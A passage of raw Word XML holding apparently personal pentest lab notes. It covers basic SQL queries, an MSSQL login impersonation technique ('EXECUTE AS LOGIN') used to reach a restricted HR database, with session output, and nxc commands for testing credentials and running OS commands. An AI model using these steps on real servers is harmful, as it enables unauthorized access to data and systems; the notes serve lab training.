        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM [table_name] WHERE [column_name] = 'value';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Count Rows in a Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COUNT(*) FROM [table_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000194F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001950">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rphcz16acuje" w:id="202"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to impersonate other users on mssql to access databases you don't have access to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001951">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001952">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId516">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hokkaido</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we learned this very interesting technique to look at mssql databases that you don't have access to. For example, if you see this error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001953">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (HAERO\discovery  guest@master)&gt; use hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001954">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001955">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001956">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then that means you (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HAERO\discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) don't have the permissions to see the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" database. But, we can see if we can impersonate another mssql user to view this database!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001957">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001958">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001959">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it works, you should see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--------------  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000195F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means you can impersonate the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001960">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001961">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets login as that user (in mssql) and use hrappdb database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001962">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001963">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (HAERO\discovery  guest@master)&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE AS LOGIN = 'hrappdb-reader'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001964">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL (hrappdb-reader  guest@master)&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001965">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001966">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001967">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001968">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we got successful. let view the data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001969">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And feel free to add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hrappdb-reader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to some username list since it might be an AD user or a user for another service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000196F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001970">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001971">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m05c9bw5vddq" w:id="203"/>
      <w:bookmarkEnd w:id="203"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nxc and mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001972">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001973">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try both --local-auth and no flags</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001974">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001975">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use nxc to check connection with mssql (default is domain authentication, like DOMAIN\user):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc mssql [IP] -u [user] -p "[pass]"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001977">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try local authentication (instead of domain authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001978">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1480"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc mssql [IP] -u [user] -p "[pass]" --local-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001979">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1480"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For most HTB, you use local-auth!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000197A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000197B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also run commands inside of nxc (once you have access to mssql):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000197C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just add the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag and then a command, like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000197D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lower case </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
